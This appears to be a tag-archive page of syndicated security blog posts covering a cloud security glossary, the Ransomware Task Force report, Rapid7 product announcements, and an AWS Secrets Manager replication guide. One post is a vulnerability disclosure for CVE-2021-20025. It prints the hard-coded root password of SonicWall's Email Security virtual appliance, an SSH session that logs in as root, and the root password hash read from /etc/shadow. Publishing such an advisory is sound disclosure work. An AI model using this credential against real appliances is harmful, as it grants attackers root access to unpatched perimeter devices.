Tag Archives: cloud security

Cloud Security Glossary: Key Terms and Definitions

Post Syndicated from Shelby Matthews original https://blog.rapid7.com/2021/08/11/cloud-security-glossary-key-terms-to-know/

Cloud Security Glossary: Key Terms and Definitions

When navigating the complexities of the public cloud, it’s easy to get lost in the endless acronyms, industry jargon, and vendor-specific terms. From K8s to IaC to Shift Left, it can be helpful to have a map to navigate the nuances of this emerging segment of the market.

That’s why a few cloud security experts here at Rapid7 created a list of terms that cover the basics — the key terms and concepts that help you continue your journey into cloud security and DevSecOps with clarity and confidence. Here are the most important entries in your cloud security glossary.


Application Program Interface (API): A set of functions and procedures allowing for the creation of applications that can access the features or data of an operating system, application, or other service.

  • The InsightCloudSec API can be used to create insights and bots, modify compliance packs, and perform other functions outside of the InsightCloudSec user interface.

Cloud Security Posture Management (CSPM): CSPM solutions continuously manage cloud security risk. They detect, log, report, and provide automation to address common issues. These can range from cloud service configurations to security settings and are typically related to governance, compliance, and security for cloud resources.

Cloud Service Provider (CSP): A third-party company that offers a cloud-based platform, infrastructure, application, or storage services. The most popular CSPs are AWS, Azure, Alibaba, and GCP.

Cloud Workload Protection Program (CWPP): CWPPs help organizations protect their capabilities or workloads (applications, resources, etc.) running in a cloud instance.

Container Security: A container represents a software application and may contain all necessary code, run-time, system tools, and libraries needed to run the application. Container hosts can be packed with risk, so properly securing them means maintaining visibility into vulnerabilities associated with their components and layers.

Entitlements: Entitlements, or permissions entitlements, give domain users control over basic users’ and organization admins’ permissions to access certain parts of a tool.

Identity Access Management (IAM): A framework of policies and technologies for ensuring the right users have the appropriate access to technology resources. It’s also known as Cloud Infrastructure Entitlement Management (CIEM), which provides identity and access governance controls with the goal of reducing excessive cloud infrastructure entitlements and streamlining least-privileged access (LPA) protocols across dynamic, distributed cloud environments.

Infrastructure: With respect to cloud computing, infrastructure refers to an enterprise’s entire cloud-based or local collection of resources and services. This term is used synonymously with “cloud footprint.”

Infrastructure as Code (IaC): The process of managing and provisioning computer data centers through machine-readable definition files, rather than physical hardware configuration or interactive configuration tools. With IaC, configuration files contain your infrastructure specifications, making it easier to edit and distribute configurations.

Kubernetes: A portable, extensible open-source platform for deploying, managing, and orchestrating containerized workloads and services at scale.

Least-Privileged Access (LPA): A security and access control concept that gives users the minimum necessary permissions based on the functions required for their particular roles.

Shared Responsibility Model: A framework in cloud computing that defines who is responsible for the security and compliance of each component of the cloud architecture. With on-premise data centers, the responsibility is solely on your organization to manage and maintain security for the entire technology stack, from the physical hardware to the applications and data. Because public cloud computing purposefully abstracts layers of that tech stack, this model acts as an agreement between the CSP and their customer as to who takes on the responsibility of managing and maintaining proper hygiene and security within the cloud infrastructure.

Shift Left: A concept that refers to building security into an earlier stage of the development cycle. Traditionally, security checks occurred at the end of the cycle. By shifting left, organizations can ensure their applications are more secure from the start — and at a much lower cost.

BECOME FLUENT IN CLOUD SECURITY

Read the full glossary now

The Ransomware Task Force: A New Approach to Fighting Ransomware

Post Syndicated from Jen Ellis original https://blog.rapid7.com/2021/08/03/the-ransomware-task-force-a-new-approach-to-fighting-ransomware/

The Ransomware Task Force: A New Approach to Fighting Ransomware

In the past few months, we’ve seen ransomware attacks shut down healthcare across Ireland, fuel delivery across parts of the US, and meat processing across Australia, Canada and the US. We’ve seen demands of payments in the tens of millions of dollars. We’re also continuing to see trends around ransomware-as-a-service and double or triple extortion continuing to rise. It’s clear that ransomware attacks are increasing in frequency, breadth, sophistication, scale, and impact.

Recognizing this, the Institute for Security and Technology put together a comprehensive Ransomware Task Force (RTF) to identify new approaches to shift the dynamics of ransomware and reduce opportunities for attackers. The Ransomware Task Force involved more than 60 participants representing a wide range of expertise and experience, including from multiple governments, law enforcement, civil society and public policy nonprofits, and security advancement groups. From the private sector, organizations of all sizes participated, including many that have experienced ransomware attacks firsthand or that are involved in dealing with the fallout, such as cybersecurity companies, law firms, and cyber insurers. Rapid7 was among those that participated — I was one of the co-chairs, and my amazing colleagues, Bob Rudis, Tod Beardsley, and Scott King participated as well.

From the outset, the intent of the Task Force was to look at the issue holistically and come up with a comprehensive set of recommendations to deter and disrupt ransomware attackers, thereby helping organizations prepare for and respond to attacks at scale. Recognizing the scale and severity of the issue — and the need for systemic and societal responses — our target audience was policymakers and government leaders.

The Task Force recognized that ransomware is not a new topic, and we had no desire to rehash previous efforts. Instead, we sought to learn from them and, where appropriate, amplify and extend them, supporting the next period of growth on this thorny issue. Ransomware’s reach and impact are increasing, which has a serious impact on society. The effects are only likely to worsen without significant action from governments and other leaders.

Key recommendations

The final report issued by the Task Force makes 48 recommendations, broken into actions to deter, disrupt, prepare for, and respond to ransomware attacks. The recommendations are designed to work in concert with each other, though we recognize there are a large number of them, and many will take time to implement. In reality, though, there truly is no silver bullet for addressing ransomware, no one thing that will magically solve this problem. If we want to shift the dynamics in a meaningful way that makes it harder for attackers to succeed, we need to make adjustments in a range of areas. It’s also worth noting that the Task Force’s goal was to provide recommendations to government and other leaders, not to provide tactical, technical guidance.

Given there are 48 recommendations, and they are well set out in the report, I won’t go over them now. I’ll just highlight a few of the big themes and, where relevant, what’s happened since the launch of the report.

Make it a top priority

One of the biggest challenges we face with any discussion around cybercrime is that it’s often viewed as a niche technical problem, not as a broad societal issue. This has made it harder to get the required attention and investment in solutions. The Task Force called for senior political leaders to recognize ransomware for what it is: a national security issue and a major threat to our ways of life (Action 1.2.5, page 26). We also called for a whole-of-government approach whereby leaders would engage various stakeholders across the government to help ensure necessary action is taking place collaboratively across the board (Actions 1.2.1 and 1.2.2, page 23).

One possible silver lining of the recent attacks against critical infrastructure is that they’ve helped establish this level of priority. In the US, we’ve seen various parts of the government start to take action: Congress has held hearings and proposed legislation; the Department of Justice has given ransomware investigations similar status to those for terrorism; the Department of Homeland Security has issued new cybersecurity guidelines for pipelines; the White House issued a memo to urge the private sector to take steps to protect against ransomware; and even President Biden has talked about ransomware in press conferences and with other world leaders.

Global action for a global problem

To take meaningful action to reduce ransomware attacks, we must acknowledge the geopolitical aspects. Firstly, the issue affects countries all around the world. Governments taking action should do so in coordination and cooperation in order to amplify the impact and hit attackers on multiple fronts at once (Actions 1.1.1 – 1.1.4, 1.2.6, pages 21-22, 26).

Secondly, and perhaps more crucially, one of the main advantages for attackers is the existence of nations that provide safe havens, because they’re either unwilling or unable to prosecute cybercriminals. This also makes it much harder for other countries to prosecute these criminals, and as such, ransomware attackers rarely seem to fear consequences for their actions.

The Task Force recommended that governments work together to tackle the issue of safe havens and adopt key practices to protect their citizens — or help them better protect themselves (Actions 1.3.1 and 1.3.2, page 27).

We’ve already seen some progress in this regard, as ransomware was raised at the recent G7 Summit, and the resulting communique included the following commitment from members:

“We also commit to work together to urgently address the escalating shared threat from criminal ransomware networks. We call on all states to urgently identify and disrupt ransomware criminal networks operating from within their borders, and hold those networks accountable for their actions.”

It will be interesting to see whether and how the G7 members will follow through on this commitment. I hope they’ll take action, build momentum, and recruit participation from other nations.

Reducing paths to revenue

As mentioned above, we’re seeing attackers demand higher and higher ransoms, which likely attracts other criminals to enter the market. Hopefully, the opposite is also true; if we reduce the opportunity to make money from ransomware, the number of attacks will decrease.

This rationale, coupled with discomfort over the idea of ransom payments being used to fund other types of organized crime — including human trafficking, child exploitation, and weapons trafficking — resulted in a great deal of discussion around the notion of banning ransom payments.

While the Task Force agreed that payments should be discouraged, the idea of a legal prohibition was challenging. Given the lack of real risk or friction for attackers, it’s likely that if payments were outlawed, attackers wouldn’t simply give up. Rather, they’d first play a game of chicken against victims, focusing on the organizations least likely to resist paying — namely providers of critical functions that can’t be disrupted without profound impact on society, or small-to-medium businesses that aren’t financially able to prepare for and weather an attack.

Given the concerns over these practicalities, the Task Force did not recommend banning payments. Rather, we looked at alternative ways of reducing the ease with which attackers realize a profit. There are two main paths to this: reducing the likelihood of victims making a payment, and making it technically harder for attackers to get their payment.

In terms of making victims think twice before making a payment, the RTF recommended a few measures:

  • Requiring the disclosure of payments (Action 4.2.4, page 46): This will help to build greater understanding of what is happening in the attack landscape and may enable law enforcement to build more information on attackers, or even recapture payments.
  • Requiring organizations to conduct cost-benefit analysis prior to making payments (Action 4.3.1 and 4.3.2, pages 47 and 48): This will encourage organizations to look into alternative options for resolution — for example, turning to the No More Ransom Project to seek decryption keys.
  • Creating a fund to assist certain organizations in recovery (Action 4.1.2, page 43): Often, organizations say the cost of recovery significantly outsizes that of the ransom, leaving them no choice but to give into their attacker’s demands. For qualifying organizations, this fund would rebalance the scales and give them a pragmatic alternative to paying the ransom.

On the other track — disrupting the system that facilitates the payment of ransoms — the RTF recommended that cryptocurrency exchanges, kiosks, and over-the-counter trading desks be required to comply with existing laws, such as Know Your Customer (KYC), Anti-Money Laundering (AML), and Combatting Financing of Terrorism (CFT) (Action 2.1.2, pages 29 and 30).

Better preparation, better response

During the explorations of the Task Force, it became apparent that part of the reason ransomware attacks are so successful is that many organizations don’t truly understand the threat, believe it’s relevant to them, or understand how to protect themselves. We repeatedly heard that, while there is a lot of information on ransomware, it’s overwhelming and often unhelpful. Many organizations don’t know what to focus on, and guidance may be oversimplified, overcomplicated, or insufficient.

With this in mind, one of our top recommendations was for the development of a ransomware framework that would cover measures for both preparing for and responding to attacks (Action 3.1.1, pages 35 and 36). The framework would need to be pragmatic, actionable, and address varying levels of sophistication and capability (Action 3.1.2, page 36). And because one of our main themes was around international cooperation, we also recommended there be a single source of truth adopted and promoted by multiple governments around the world. In fact, we recommended the framework be developed through both international and public-private collaboration. It should also be kept up to date to react to evolving ransomware attack trends.

Creating the framework is a lift, but it’s only part of the battle — you can’t drive adoption if you don’t also tackle the lack of awareness and understanding. As such, we also recommend that governments run high-profile awareness campaigns, partnering with organizations with reach into audiences that aren’t being well addressed today (Actions 3.2.1 and 3.2.2, pages 37 and 38). For example, many governments have toolkits or content aimed at small-to-medium businesses, but most leaders of these organizations seem largely unaware of the risk — until someone they know personally is hit by an attack.

The path forward

Unfortunately, ransomware continues to dominate headlines and harm organizations around the world. As a result, many governments are paying a great deal of attention to this issue and looking for solutions. I’m relieved to say the Ransomware Task Force’s report and recommendations have seen a fair bit of interest and support. For us, the next challenge is to keep the momentum going and help governments translate interest into action.

In the meantime, my colleagues at Rapid7 and I will continue to try to help our customers and community prepare for and respond to attacks. We’re working on some other content to help people better understand the dynamics of the issue, as well as the steps they can take to protect themselves or get involved in broader response efforts.

Look out for our series of blogs on different aspects of ransomware, and in the meantime, check out our interviews with ransomware experts on our Security Nation podcast. You can also check out my talk and Q&A on the Ransomware Task Force at Black Hat, or as part of Rapid7’s Virtual Vegas, which includes a Ransomware (un)Happy Hour — bring your ransomware war stories, lessons learned, or questions.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Rapid7 Introduces: Kubernetes Security Guardrails

Post Syndicated from Alon Berger original https://blog.rapid7.com/2021/07/26/rapid7-introduces-kubernetes-security-guardrails/

Rapid7 Introduces: Kubernetes Security Guardrails

Cloud and container technology provide tremendous flexibility, speed, and agility, so it’s not surprising that organizations around the globe are continuing to embrace cloud and container technology. Many organizations are using multiple tools to secure their often complex cloud and container environments, while struggling to maintain the flexibility, speed, and agility required to keep security intact.

Cloud Security Just Got Better!

In addition to acquiring DivvyCloud, a top-tier Cloud Security Posture Management (CSPM) platform in 2020, Rapid7 recently announced another successful acquisition— joining forces with Alcide, a leading Kubernetes security start-up that offers advanced Cloud Workload Protection Platform (CWPP) capabilities.

Rapid7 is taking the lead in the CSPM space by leveraging both DivvyCloud’s and Alcide’s capabilities and incorporating them into a single platform: InsightCloudSec, your one-stop shop for superior cloud security solutions.

Learn more about InsightCloudSec here

Built for DevOps, Trusted by Security

In retrospect, 2020 was a tipping point for the Kubernetes community, with a massive increase in adoption across the globe. Many companies, seeking an efficient, cost-effective way to make this huge shift to the cloud, turned to Kubernetes. But this in turn created a growing need to remove the Kubernetes security blind spots. It is for this reason that we are introducing Kubernetes Security Guardrails.

With Kubernetes Security Guardrails, organizations are equipped with a multi-cluster vulnerability scanner that covers rich Kubernetes security best practices and compliance policies, such as CIS Benchmarks. As part of Rapid7’s InsightCloudSec solution, this new ability introduces a platform-based and easy-to-maintain solution for Kubernetes security that is deployed in minutes and is fully streamlined in the Kubernetes pipeline.

Securing Kubernetes With InsightCloudSec

Kubernetes Security Guardrails is the most comprehensive solution for all relevant Kubernetes security requirements, designed from a DevOps perspective with in-depth visibility for security teams. Integrated within minutes, Kubernetes Guardrails simplifies the security assessment for the entire Kubernetes environment and the CI/CD pipeline while creating baseline profiles for each cluster, highlighting and scoring security risks, misconfigurations, and hygiene drifts.

Both DevOps and Security teams enjoy the continuous and dynamic analysis of their Kubernetes deployments, all while seamlessly complying with regulatory requirements for Kubernetes such as PCI, GDPR, and HIPAA.

With Kubernetes Guardrails, Dev teams are able to create a snapshot of cluster risks, delivered with a detailed list of misconfigurations, while detecting real-time hygiene and conformance drifts for deployments running on any cloud environment.

Some of the most common use cases include:

  • Kubernetes vulnerability scanning
  • Hunting misplaced secrets and excessive secret access
  • Workload hardening (from pod security to network policies)
  • Istio security and configuration best practices
  • Ingress controllers security
  • Kubernetes API server access privileges
  • Kubernetes operators best practices
  • RBAC controls and misconfigurations

Rapid7 proudly brings forward a Kubernetes security solution that encapsulates all-in-one capabilities with incomparable coverage for all things Kubernetes.

With a security-first approach and a strict compliance adherence, Kubernetes Guardrails enable a better understanding and control over distributed projects, and help organizations maintain smooth business operations.

Want to learn more? Register for the webinar on InsightCloudSec and its Kubernetes protection.

Introducing InsightCloudSec

Post Syndicated from Brian Johnson original https://blog.rapid7.com/2021/07/07/introducing-insightcloudsec/

Introducing InsightCloudSec

A little over a year ago, when DivvyCloud first combined forces with Rapid7, I wrote that we did it because of culture, technology alignment, and the opportunity to drive even greater innovation in cloud security.

Those core values remain true, and so does something else. As more organizations adopt and invest in cloud and container technology, the issues facing cloud security programs continue to put enterprises at significant risk. The need for fully-integrated solutions that enable continuous security and compliance for cloud environments also continues to increase exponentially. Organizations need simple yet comprehensive visibility into their cloud and container environments to help mitigate risk, potential threats, and misconfigurations. With this growing need for automation and security, I’m proud to announce our next step in helping to drive cloud security forward: InsightCloudSec.

InsightCloudSec is our combined solution of all the things our customers love about DivvyCloud, now with cluster-level Kubernetes security capabilities from Alcide, aligned and integrated with Rapid7’s Insight Platform. Our team and customer-driven, innovation-focused roadmap will stay the same. Combining all of our efforts and energy into InsightCloudSec allows us to move forward as a more powerful cloud security solution.

Combining forces to become a leader in cloud security

Rapid7 acquired both DivvyCloud and Alcide in the past 15 months to more effectively solve the complex security challenges that we’ve seen arise from the scale and speed of cloud adoption.

Now more than ever, it’s clear that solving these challenges requires a single solution that brings the core capabilities of cloud security together, including posture management, identity and access management, infrastructure as code analysis, and Kubernetes protection. Furthermore, we want to bring all of this cloud security functionality together on a platform that also features additional security capabilities, from vulnerability management to detection and response, in order to provide the full context necessary to accurately assess risk within the cloud environment.

By bringing all of these features together, our goal is to help our customers achieve 3 ultimate goals:

  • Shift Left—We want to help customers prevent problems before they happen by providing a single, consistent set of security checks throughout the CI/CD pipeline to uncover misconfigurations and policy violations without delaying deployment.
  • Reduce Noise—We want to simplify and speed up risk assessment by combining unified visibility and shared terminology with rich contextual insights gathered from across each layer of your cloud environment.
  • Automate Workflows—Finally, we want to help security teams enable developers to take full advantage of the speed and scale of the cloud safely with precise automation that speeds up remediation, reduces busywork, and allows the security team to focus on the bigger picture.

Behind this announcement, our team is as energized and dedicated as ever to our goal of delivering innovative capabilities and the industry-leading support that has helped our customers develop some of the most mature cloud security programs in the world over the last eight years.

If you’re interested in learning more about what we have in store, join us for an upcoming webinar on July 27 at 11:00 a.m. EDT.

Automated remediation level 3: Governance and hygiene

Post Syndicated from Aaron Wells original https://blog.rapid7.com/2021/06/28/automated-remediation-level-3-governance-and-hygiene/

Mold it, make it, just don’t fake it

Automated remediation level 3: Governance and hygiene

At a quick glance, it seems like the title of this blog is “government hygiene.” Most likely, that wouldn’t be a particularly exciting read, but we’re hoping you might be engaged enough to gain a few takeaways from this fourth piece in our series on automating remediation and how it can benefit your team and cost center.

The best way to mold a solution that makes sense for your company and cloud security is by adding actions that cause the fewest deviations in your day-to-day operations. Of course, there are several best-practice use cases that can make sense for your organization. Let’s take a look at a few so you can decide which one(s) work(s) for you.

Environment enforcement

Sandboxes are designed to be safe spaces, so they should also be clean spaces. As Software Development Life Cycles (SDLC) accelerate and security posture moves increasingly left into the hands of the developers spinning things up, it’s important to not only isolate and lock down your sandbox space, but to create a repeat cleaning schedule. Your software release cycle can also act as regularly scheduled sandbox maintenance.

No exemptions for expensive instances

Spinning up instances that suck up resources from other critical applications can cost you. Sometimes they’re necessary, often they’re not. Whether it’s by cost, family type, or hardware specs, continuous monitoring is key so that even when unnecessarily resource-intensive processes aren’t automatically killed, you still have a good idea of what’s costing too much time and too much money. AWS CloudWatch, for instance, can help you monitor EC2 instances by stopping and starting them at scheduled intervals.

Cleanliness ≠ costliness

Properly automating anything in cloud security is ultimately going to save money for the organization. But, as we’ve discussed to some extent above and throughout this series, you’ll want to make sure automation isn’t creating unnecessary instances, orphaning outdated resources, or stagnating old snapshots and unused databases. Yep, there are a lot of things that can start to add up and begin puffing out a budget. Creating more efficient data pipelines and discovering which parts of the remediation process are the most labor-intensive can help identify where you should focus effort and resources. In this way, you can begin to target those areas that will require the most regular hygiene and cleanup.

Put a cork in the port (exposure)

Since everything on the internet is communicated and transferred via ports, it’s probably a good idea to think about locking down exposed ports that may be running protocols like Secure Shell (SSH) or Remote Desktop (RDP). Automating this type of cleanup will require knowing, similar to the above section, which ports do most of the heavy lifting in the daily rhythms of your cloud -security operations. If a port isn’t being used in a meaningful way — or you simply don’t have any idea what its use is — best to shut it down.

Stay vigilant while basking in benefits

Ensuring you’re getting the most organized automation framework as possible takes work, but it’s considerably less work than if you had no framework at all. Automating good governance and hygiene practices can add time saved to the overall benefits gained from this work. But, we must all be good monitors of these processes and put checks in place to ensure your automation framework actually works for you and continues to save time and effort for years to come.

With that, we’re ready for a deep-dive into the final of 4 Levels of Automated Remediation. You can also read the previous entry in this series here.  

Level 4 coming soon!

CVE-2021-20025: SonicWall Email Security Appliance Backdoor Credential

Post Syndicated from Tod Beardsley original https://blog.rapid7.com/2021/06/23/cve-2021-20025-sonicwall-email-security-appliance-backdoor-credential/

CVE-2021-20025: SonicWall Email Security Appliance Backdoor Credential

The virtual, on-premises version of the SonicWall Email Security Appliance ships with an undocumented, static credential, which can be used by an attacker to gain root privileges on the device. This is an instance of CWE-798: Use of Hard-coded Credentials, and has an estimated CVSSv3 score of 9.1. This issue was fixed by the vendor in version 10.0.10, according to the vendor’s advisory, SNWLID-2021-0012.

Product Description

The SonicWall Email Security Virtual Appliance is a solution which “defends against advanced email-borne threats such as ransomware, zero-day threats, spear phishing and business email compromise (BEC).” It is in use in many industries around the world as a primary means of preventing several varieties of email attacks. More about SonicWall’s solutions can be found at the vendor’s website.

Credit

This issue was discovered by William Vu of Rapid7, and is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Exploitation

The session capture detailed below illustrates using the built-in SSH management interface to connect to the device as the root user with the password, “sonicall”.

This attack was tested on 10.0.9.6105 and 10.0.9.6177, the latest builds available at the time of testing.

wvu@kharak:~$ ssh -o stricthostkeychecking=no -o userknownhostsfile=/dev/null [email protected]
Warning: Permanently added '192.168.123.251' (ECDSA) to the list of known hosts.
For CLI access you must login as snwlcli user.
[email protected]'s password: sonicall
[root@snwl ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
[root@snwl ~]# uname -a
Linux snwl.example.com 4.19.58-snwl-VMWare64 #1 SMP Wed Apr 14 20:59:36 PDT 2021 x86_64 GNU/Linux
[root@snwl ~]# grep root /etc/shadow
root:Y0OoRLtjUwq1E:12605:0:::::
[root@snwl ~]# snwlcli
Login: admin
Password:
SNWLCLI> version
10.0.9.6177
SNWLCLI>

Impact

Given remote root access to what is usually a perimeter-homed device, an attacker can further extend their reach into a targeted network to launch additional attacks against internal infrastructure from across the internet. More locally, an attacker could likely use this access to update or disable email scanning rules and logic to allow for malicious email to pass undetected to further exploit internal hosts.

Remediation

As detailed in the vendor’s advisory, users are urged to use at least version 10.0.10 on fresh installs of the affected virtual host. Note that updating to version 10.0.10 or later does not appear to resolve the issue directly; users who update existing versions should ensure they are also connected to the MySonicWall Licensing services in order to completely resolve the issue.

For sites that are not able to update or replace affected devices immediately, access to remote management services should be limited to only trusted, internal networks — most notably, not the internet.

Disclosure Timeline

Rapid7’s coordinated vulnerability disclosure team is deeply impressed with this vendor’s rapid turnaround time from report to fix. This vulnerability was both reported and confirmed on the same day, and thanks to SonicWall’s excellent PSIRT team, a fix was developed, tested, and released almost exactly three weeks after the initial report.

  • April, 2021: Issue discovered by William Vu of Rapid7
  • Thu, Apr 22, 2021: Details provided to SonicWall via their CVD portal
  • Thu, Apr 22, 2021: Confirmed reproduction of the issue by the vendor
  • Thu, May 13, 2021: Update released by the vendor, removing the static account
  • Thu, May 13, 2021: CVE-2021-20025 published in SNWLID-2021-0012
  • Wed, Jun 23, 2021: Rapid7 advisory published with further details

AWS Verified episode 5: A conversation with Eric Rosenbach of Harvard University’s Belfer Center

Post Syndicated from Stephen Schmidt original https://aws.amazon.com/blogs/security/aws-verified-episode-5-a-conversation-with-eric-rosenbach-of-harvard-universitys-belfer-center/

I am pleased to share the latest episode of AWS Verified, where we bring you conversations with global cybersecurity leaders about important issues, such as how to create a culture of security, cyber resiliency, Zero Trust, and other emerging security trends.

Recently, I got the opportunity to experience distance learning when I took the AWS Verified series back to school. I got a taste of life as a Harvard grad student, meeting (virtually) with Eric Rosenbach, Co-Director of the Belfer Center of Science and International Affairs at Harvard University’s John F. Kennedy School of Government. I call it, “Verified meets Veritas.” Harvard’s motto may never be the same again.

In this video, Eric shared with me the Belfer Center’s focus as the hub of the Harvard Kennedy School’s research, teaching, and training at the intersection of cutting edge and interdisciplinary topics, such as international security, environmental and resource issues, and science and technology policy. In recognition of the Belfer Center’s consistently stellar work and its six consecutive years ranked as the world’s #1 university-affiliated think tank, in 2021 it was named a center of excellence by the University of Pennsylvania’s Think Tanks and Civil Societies Program.

Eric’s deep connection to the students reflects the Belfer Center’s mission to prepare future generations of leaders to address critical areas in practical ways. Eric says, “I’m a graduate of the school, and now that I’ve been out in the real world as a policy practitioner, I love going into the classroom, teaching students about the way things work, both with cyber policy and with cybersecurity/cyber risk mitigation.”

In the interview, I talked with Eric about his varied professional background. Prior to the Belfer Center, he was the Chief of Staff to US Secretary of Defense, Ash Carter. Eric was also the Assistant Secretary of Defense for Homeland Defense and Global Security, where he was known around the US government as the Pentagon’s cyber czar. He has served as an officer in the US Army, written two books, been the Chief Security Officer for the European ISP Tiscali, and was a professional committee staff member in the US Senate.

I asked Eric to share his opinion on what the private sector and government can learn from each other. I’m excited to share Eric’s answer to this with you as well as his thoughts on other topics, because the work that Eric and his Belfer Center colleagues are doing is important for technology leaders.

Watch my interview with Eric Rosenbach, and visit the AWS Verified webpage for previous episodes, including interviews with security leaders from Netflix, Vodafone, Comcast, and Lockheed Martin. If you have an idea or a topic you’d like covered in this series, please leave a comment below.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Steve Schmidt

Steve is Vice President and Chief Information Security Officer for AWS. His duties include leading product design, management, and engineering development efforts focused on bringing the competitive, economic, and security benefits of cloud computing to business and government customers. Prior to AWS, he had an extensive career at the Federal Bureau of Investigation, where he served as a senior executive and section chief. He currently holds 11 patents in the field of cloud security architecture. Follow Steve on Twitter.

How to replicate secrets in AWS Secrets Manager to multiple Regions

Post Syndicated from Fatima Ahmed original https://aws.amazon.com/blogs/security/how-to-replicate-secrets-aws-secrets-manager-multiple-regions/

On March 3, 2021, we launched a new feature for AWS Secrets Manager that makes it possible for you to replicate secrets across multiple AWS Regions. You can give your multi-Region applications access to replicated secrets in the required Regions and rely on Secrets Manager to keep the replicas in sync with the primary secret. In scenarios such as disaster recovery, you can read replicated secrets from your recovery Regions, even if your primary Region is unavailable. In this blog post, I show you how to automatically replicate a secret and access it from the recovery Region to support a disaster recovery plan.

With Secrets Manager, you can store, retrieve, manage, and rotate your secrets, including database credentials, API keys, and other secrets. When you create a secret using Secrets Manager, it’s created and managed in a Region of your choosing. Although scoping secrets to a Region is a security best practice, there are scenarios such as disaster recovery and cross-Regional redundancy that require replication of secrets across Regions. Secrets Manager now makes it possible for you to easily replicate your secrets to one or more Regions to support these scenarios.

With this new feature, you can create Regional read replicas for your secrets. When you create a new secret or edit an existing secret, you can specify the Regions where your secrets need to be replicated. Secrets Manager will securely create the read replicas for each secret and its associated metadata, eliminating the need to maintain a complex solution for this functionality. Any update made to the primary secret, such as a secret value updated through automatic rotation, will be automatically propagated by Secrets Manager to the replica secrets, making it easier to manage the life cycle of multi-Region secrets.

Note: Each replica secret is billed as a separate secret. For more details on pricing, see the AWS Secrets Manager pricing page.

Architecture overview

Suppose that your organization has a requirement to set up a disaster recovery plan. In this example, us-east-1 is the designated primary Region, where you have an application running on a simple AWS Lambda function (for the example in this blog post, I’m using Python 3). You also have an Amazon Relational Database Service (Amazon RDS) – MySQL DB instance running in the us-east-1 Region, and you’re using Secrets Manager to store the database credentials as a secret. Your application retrieves the secret from Secrets Manager to access the database. As part of the disaster recovery strategy, you set up us-west-2 as the designated recovery Region, where you’ve replicated your application, the DB instance, and the database secret.

To elaborate, the solution architecture consists of:

  • A primary Region for creating the secret, in this case us-east-1 (N. Virginia).
  • A replica Region for replicating the secret, in this case us-west-2 (Oregon).
  • An Amazon RDS – MySQL DB instance that is running in the primary Region and configured for replication to the replica Region. To set up read replicas or cross-Region replicas for Amazon RDS, see Working with read replicas.
  • A secret created in Secrets Manager and configured for replication for the replica Region.
  • AWS Lambda functions (running on Python 3) deployed in the primary and replica Regions acting as clients to the MySQL DBs.

This architecture is illustrated in Figure 1.

Figure 1: Architecture overview for a multi-Region secret replication with the primary Region active

Figure 1: Architecture overview for a multi-Region secret replication with the primary Region active

In the primary region us-east-1, the Lambda function uses the credentials stored in the secret to access the database, as indicated by the following steps in Figure 1:

  1. The Lambda function sends a request to Secrets Manager to retrieve the secret value by using the GetSecretValue API call. Secrets Manager retrieves the secret value for the Lambda function.
  2. The Lambda function uses the secret value to connect to the database in order to read/write data.

The replicated secret in us-west-2 points to the primary DB instance in us-east-1. This is because when Secrets Manager replicates the secret, it replicates the secret value and all the associated metadata, such as the database endpoint. The database endpoint details are stored within the secret because Secrets Manager uses this information to connect to the database and rotate the secret if it is configured for automatic rotation. The Lambda function can also use the database endpoint details in the secret to connect to the database.

To simplify database failover during disaster recovery, as I’ll cover later in the post, you can configure an Amazon Route 53 CNAME record for the database endpoint in the primary Region. The database host associated with the secret is configured with the database CNAME record. When the primary Region is operating normally, the CNAME record points to the database endpoint in the primary Region. The requests to the database CNAME are routed to the DB instance in the primary Region, as shown in Figure 1.

During disaster recovery, you can failover to the replica Region, us-west-2, to make it possible for your application running in this Region to access the Amazon RDS read replica in us-west-2 by using the secret stored in the same Region. As part of your failover script, the database CNAME record should also be updated to point to the database endpoint in us-west-2. Because the database CNAME is used to point to the database endpoint within the secret, your application in us-west-2 can now use the replicated secret to access the database read replica in this Region. Figure 2 illustrates this disaster recovery scenario.

Figure 2: Architecture overview for a multi-Region secret replication with the replica Region active

Figure 2: Architecture overview for a multi-Region secret replication with the replica Region active

Prerequisites

The procedure described in this blog post requires that you complete the following steps before starting the procedure:

  1. Configure an Amazon RDS DB instance in the primary Region, with replication configured in the replica Region.
  2. Configure a Route 53 CNAME record for the database endpoint in the primary Region.
  3. Configure the Lambda function to connect with the Amazon RDS database and Secrets Manager by following the procedure in this blog post.
  4. Sign in to the AWS Management Console using a role that has SecretsManagerReadWrite permissions in the primary and replica Regions.

Enable replication for secrets stored in Secrets Manager

In this section, I walk you through the process of enabling replication in Secrets Manager for:

  1. A new secret that is created for your Amazon RDS database credentials
  2. An existing secret that is not configured for replication

For the first scenario, I show you the steps to create a secret in Secrets Manager in the primary Region (us-east-1) and enable replication for the replica Region (us-west-2).

To create a secret with replication enabled

  1. In the AWS Management Console, navigate to the Secrets Manager console in the primary Region (N. Virginia).
  2. Choose Store a new secret.
  3. On the Store a new secret screen, enter the Amazon RDS database credentials that will be used to connect with the Amazon RDS DB instance. Select the encryption key and the Amazon RDS DB instance, and then choose Next.
  4. Enter the secret name of your choice, and then enter a description. You can also optionally add tags and resource permissions to the secret.
  5. Under Replicate Secret – optional, choose Replicate secret to other regions.

    Figure 3: Replicate a secret to other Regions

    Figure 3: Replicate a secret to other Regions

  6. For AWS Region, choose the replica Region, US West (Oregon) us-west-2. For Encryption Key, choose Default to store your secret in the replica Region. Then choose Next.

    Figure 4: Configure secret replication

    Figure 4: Configure secret replication

  7. In the Configure Rotation section, you can choose whether to enable rotation. For this example, I chose not to enable rotation, so I selected Disable automatic rotation. However, if you want to enable rotation, you can do so by following the steps in Enabling rotation for an Amazon RDS database secret in the Secrets Manager User Guide. When you enable rotation in the primary Region, any changes to the secret from the rotation process are also replicated to the replica Region. After you’ve configured the rotation settings, choose Next.
  8. On the Review screen, you can see the summary of the secret configuration, including the secret replication configuration.

    Figure 5: Review the secret before storing

    Figure 5: Review the secret before storing

  9. At the bottom of the screen, choose Store.
  10. At the top of the next screen, you’ll see two banners that provide status on:
    • The creation of the secret in the primary Region
    • The replication of the secret in the Secondary Region

    After the creation and replication of the secret is successful, the banners will provide you with confirmation details.

At this point, you’ve created a secret in the primary Region (us-east-1) and enabled replication in a replica Region (us-west-2). You can now use this secret in the replica Region as well as the primary Region.

